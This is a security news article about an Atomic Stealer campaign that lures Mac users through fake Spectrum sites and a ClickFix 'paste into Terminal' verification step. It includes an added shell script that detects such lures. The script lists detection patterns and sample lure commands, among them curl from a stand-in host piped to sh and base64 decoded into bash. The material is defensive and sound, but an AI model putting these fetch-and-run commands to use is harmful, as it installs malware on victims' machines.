Macs under threat from new malware campaign impersonating major ISP — how to stay safe

MacBook Pro 2021 (16-inch) on a patio table
(Image credit: Tom's Guide)

Even though people often think Macs are safe from malware, that definitely isn’t true. Case in point, a new Atomic Stealer campaign, which is being used to infect the best MacBooks and other Apple computers with info-stealing malware, has been spotted online.

As reported by The Hacker News, the campaign was discovered by the cybersecurity firm CloudSEK, which attributes it to Russian-speaking hackers based on Russian-language comments found in the malware's source code.

What makes this campaign particularly interesting is the fact that, in addition to typosquatting, it also uses social engineering to trick unsuspecting Mac users into falling for it. For those unfamiliar, typosquatting is a type of attack where cybercriminals register lookalike domains in order to lay traps for potential victims who mistype a popular site’s URL into their browser’s address bar. While they might think they’re on a popular company’s website, instead, they’re actually on a fake site designed to mimic the real one, which is also used to spread dangerous malware.

Here’s everything you need to know about this new malware campaign, along with some tips and tricks to prevent you from falling victim to it and other cyberattacks.

Not the Spectrum you were looking for

A screenshot of a fake site impersonating the internet and cable provider Spectrum

(Image credit: CloudSEK/Tom's Guide)

According to CloudSEK, the hackers behind this new campaign are impersonating the U.S. internet and cable provider Spectrum using several fake websites. While Spectrum's official website can be found at spectrum[.]com, the firm's blog post highlights one of these fake sites, which uses the lookalike domain panel-spectrum[.]net.

Once on this fake site, potential victims are asked to complete a reCAPTCHA to verify that they aren't bots. Since many sites use this or similar forms of verification, many people might not even think twice when asked to check a box to prove they're human. However, on the fake site shared by CloudSEK, the check is designed to fail, and potential victims are then asked to complete an alternative verification instead.

When someone clicks on the button that reads "Alternative Verification", a command is silently copied to their clipboard. A set of instructions then appears that asks them to open a command prompt, paste the code that was copied to their clipboard and hit "Enter" to run it on Windows. If someone is using a Mac, slightly different instructions are shown (the paste goes into the Terminal app rather than a command prompt) that lead to the same outcome: their computer is infected with info-stealing malware.

On Macs, the pasted command runs a malicious shell script that steals system passwords and downloads a variant of the Atomic Stealer malware. As CloudSEK security researcher Koushik Pal points out in the company's report, the script "uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries."

How to stay safe from Mac malware

A padlock resting next to the Apple logo on the lid of a gold-colored Apple laptop.

(Image credit: robert coolen/Shutterstock)

Given that hackers use all kinds of different tricks to lead potential victims to fake sites spreading malware, it's always best to type a company's website into your browser's address bar manually, and to double-check that you spelled it correctly before hitting Enter.

If you don't know a company's official site, you can use a search engine to find it. One thing you want to be careful about, though, is not clicking the first link you see. On Google and other search engines, the links at the top are often ads, and finding a company's actual website often requires scrolling a bit further down the page. The problem with clicking on an ad or a sponsored search result is that cybercriminals often use malicious ads to send users to fake sites instead of a company's actual site, since anyone (even hackers) can buy ad space online.

From here, it's a matter of knowing how to identify a ClickFix attack. Many sites ask that you complete a reCAPTCHA or other form of verification before entering. However, if a site asks you to open a command window or Terminal and paste something from your clipboard there before hitting "Enter", this is a major red flag. A legitimate company might ask you to select all of the images that are cars, but it would never copy code to your clipboard without your knowledge and then ask you to paste and run it somewhere else. If you are ever unsure, look at what is actually on your clipboard before you paste it anywhere: a "verification" step should never involve commands that download and run files.
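The lure described above ends with a command on the clipboard that the victim is told to paste into Terminal. As an added example (not code from the original article or from CloudSEK's report), the POSIX shell script below scores a pasted string for common ClickFix-style indicators: piping curl or wget into a shell, decoding base64 into a shell, osascript one-liners, stripping the com.apple.quarantine attribute, backgrounding with nohup, and executing out of /tmp. The indicator patterns, the function names (clickfix_indicators, clickfix_score, is_clickfix, check_clipboard) and the sample commands are all assumptions for illustration; the samples are constructed, use the reserved example.invalid domain and a base64 payload that only decodes to "echo hi", and are not commands from the real campaign.

```shell
#!/bin/sh
# Added example: heuristic check for ClickFix-style clipboard commands.
# Not CloudSEK's or Tom's Guide's code; indicator patterns are assumptions
# about common lure shapes, not a signature for any real Atomic Stealer sample.

# Print the name of every indicator that matches the text in $1, one per line.
clickfix_indicators() {
    text=$1
    # Table of name=ERE pairs (split on the first '='; patterns contain no '=').
    while IFS='=' read -r name pattern; do
        [ -n "$name" ] || continue
        printf '%s\n' "$text" | grep -Eiq -- "$pattern" && printf '%s\n' "$name"
    done <<'EOF'
download-to-shell=(curl|wget)[^;|&]*\|[[:space:]]*(ba|z)?sh
base64-decode=base64[[:space:]]+(-d|--decode)
osascript=osascript[[:space:]]+-e
xattr-strip=xattr[[:space:]]+-[a-z]*[cd]
hidden-exec=(^|[[:space:];&|])(nohup|setsid)([[:space:]]|$)|>[[:space:]]*/dev/null[[:space:]]+2>&1
temp-dir-exec=(chmod[[:space:]]+[+]x|(^|[[:space:]])(ba|z)?sh[[:space:]])[^;&|]*/(private/|var/)?tmp/
EOF
    return 0
}

# Print the number of indicators matched by $1.
clickfix_score() {
    clickfix_indicators "$1" | wc -l | tr -d ' '
}

# Succeed (exit 0) when $1 looks like a ClickFix lure: two or more indicators,
# or a single download-to-shell / base64-decode chain on its own.
is_clickfix() {
    score=$(clickfix_score "$1")
    [ "$score" -ge 2 ] && return 0
    clickfix_indicators "$1" | grep -Eq '^(download-to-shell|base64-decode)$'
}

# macOS only: inspect the real clipboard (pbpaste) before you paste it anywhere.
check_clipboard() {
    command -v pbpaste >/dev/null 2>&1 || { echo "pbpaste not found (not macOS?)" >&2; return 2; }
    clip=$(pbpaste)
    if is_clickfix "$clip"; then
        echo "WARNING: clipboard contents look like a ClickFix lure:"
        clickfix_indicators "$clip" | sed 's/^/  - /'
        return 1
    fi
    echo "clipboard shows no ClickFix indicators"
}

# Constructed samples (assumptions, not real campaign commands). The base64
# string decodes to the harmless "echo hi"; example.invalid can never resolve.
LURE_MAC='echo "ZWNobyBoaQ==" | base64 -d | bash'
LURE_OSA='nohup osascript -e '"'"'do shell script "curl -s http://example.invalid/p | sh"'"'"' >/dev/null 2>&1 &'
BENIGN='ls -la ~/Downloads'
BENIGN2='git clone https://example.invalid/repo.git && cd repo'

# Stand-alone demo: classify each sample and list what matched.
for sample in "$LURE_MAC" "$LURE_OSA" "$BENIGN" "$BENIGN2"; do
    if is_clickfix "$sample"; then verdict="SUSPICIOUS"; else verdict="ok"; fi
    printf '%-10s %s\n' "$verdict" "$sample"
    clickfix_indicators "$sample" | sed 's/^/           - /'
done
```

On a Mac, source the script and run check_clipboard right after a site tells you to "paste and press Enter"; on any other system the demo loop still runs against the constructed samples. The score threshold is deliberately low because a single pipe-into-shell or base64-into-shell chain is already something no CAPTCHA replacement should ever ask for.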

Although your Mac does come with built-in security software in the form of Apple's own XProtect, a signature-based scanner that Apple updates quietly in the background, it's still a good idea to consider investing in one of the best Mac antivirus software solutions. Paid options are typically updated more frequently than free ones and are more likely to spot newer malware strains like Atomic Stealer, which change often to stay ahead of signature updates.

Given that attacks using this ClickFix technique have proven both successful and profitable for hackers and other cybercriminals, they're not going anywhere anytime soon. This is why it makes sense to educate yourself and your family members about these sorts of threats so that you can spot the red flags before your Mac or PC becomes infected with malware.


Anthony Spadafora
Managing Editor Security and Home Office

Anthony Spadafora is the managing editor for security and home office furniture at Tom’s Guide where he covers everything from data breaches to password managers and the best way to cover your whole home or business with Wi-Fi. He also reviews standing desks, office chairs and other home office accessories with a penchant for building desk setups. Before joining the team, Anthony wrote for ITProPortal while living in Korea and later for TechRadar Pro after moving back to the US. Based in Houston, Texas, when he’s not writing Anthony can be found tinkering with PCs and game consoles, managing cables and upgrading his smart home. 
